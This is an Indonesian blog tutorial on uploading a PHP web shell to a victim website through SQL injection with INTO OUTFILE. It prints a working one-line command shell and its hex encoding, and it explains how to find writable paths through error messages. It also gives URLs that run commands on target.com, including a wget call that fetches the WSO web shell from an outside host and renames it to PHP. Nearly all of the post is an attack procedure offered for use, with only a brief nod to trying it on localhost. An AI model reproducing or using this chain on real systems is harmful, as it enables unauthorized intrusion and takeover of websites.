Saturday, August 27, 2016

upload shell dengan sql injection into outfile

Oke sebetulnya saya pengetahuan tentang sql injection kurang, namun saya berusaha untuk bisa :'v latihan dan latihan :v. tutorial kali ini adalah bagaiaman cara upload shell via sql injection menggunakan Query "into outfile" yang fungsinya hampir sama dengan fopen() fwrite() pada PHP.

Mohon maaf  :'v karena ini hanya simulasi jadi saya menggunakan localhost sebagai percobaan :p , gak baik juga website orang buat percobaan :v . Oke langsung saja ke stepsnya:

Yang anda butuhkan :
1. Hackbar : install sini
2. browser firefox 
3. Koneksi internet 
4. Otak.

Langkah :

1. Siapkan target terlebih dahulu , jika anda baru mencoba saya sarankan untuk menggunakan localhost atau website anda sendiri :)

2. di sini saya tidak menerangkan dari awal namun di sini pastikan anda sudah menemukan angka yang muncul di website tersebut seperti di gambar :

Pastikan anda sudah dalam kondisi seperti ini




 
3. Jika Angka vulnerable sudah muncul,sekarang anda tinggal menambahkan script di bawah ini :

<?php system($_GET['wos']); ?>

dan di convert ke hexa menjadi seperti ini :

0x3c3f7068702073797374656d28245f4745545b27776f73275d293b203f3e

lalu taruh string hexa tersebut di angka yang keluar tadi.

perhatikan hackbarnya

eits.. setelah itu apa? jangan enter dulu ada yang kurang.

4. Setelah itu sudah tersusun sekarang coba cari path / directory root nya yang writable sehingga tidak terjadi error 403 :v , anda bisa mencari path atau directory root dengan memanfaatkan pesan error pada website korban sebagai contoh :
menambahkan ' (petik) pada parameter id dan mucul error





5. Nah sekarang udah ketemu path nya, dan selanjutnya kita langsung eksekusi INTO OUTFILE
dengan menambahkan string into+outfile+'/path/path/shell.php'  di belakang int terakhir union select . bingung? lihat gambar!

   
jika sudah tekan enter dan akan muncul error lagi

6. JIka sudah seperti gambar di atas tekan enter dan akan muncul error lagi. tapi gak masalah sekarang kita cek file yang kita buat menggunakan into outfile sudah ada pada website korban atau belum dengan cara? mengetahui path atau struktur direktorinya :) .


7.  dan yeay.. ternyata file yg di buat berhasil :) , kenapa error? gblk! -_- ente belum memasukan perintah :v ,dengan cara ? lihat gambar wae :

perintah filemu.php?wos=ls -lia
8. ww jika sudah seperti itu kita execute dengan wget :

http://target.com/filemu.php?wos=wget http://www.w0rms.com/shell/wso.txt


9.  jika sudah cek file  wso.txt apakah sudah terpanggil ? 
http://target.com/wso.txt atau http://target.com/path/wso.txt


10. ww ternyata udah ada filenya :v sekarang kembali lagi ke file mu yang bisa menjalankan perintah tadi, dan gantinama wso.txt tersebut menjadi wso.php dengan perintah :

http://target.com/filemu.php?wos=mv wso.txt wso.php

11. finally sekarang coba lihat
http://target.com/wso.php atau http://target.com/path/wso.php

dan taraaa....


 12 . berhasil dah.. :"

NB : Cara di atas tidak bekerja pada server windows karena perintah yang di gunakan berbeda :).
 
Share:

0 comments:

Post a Comment

Popular Posts

Recent Posts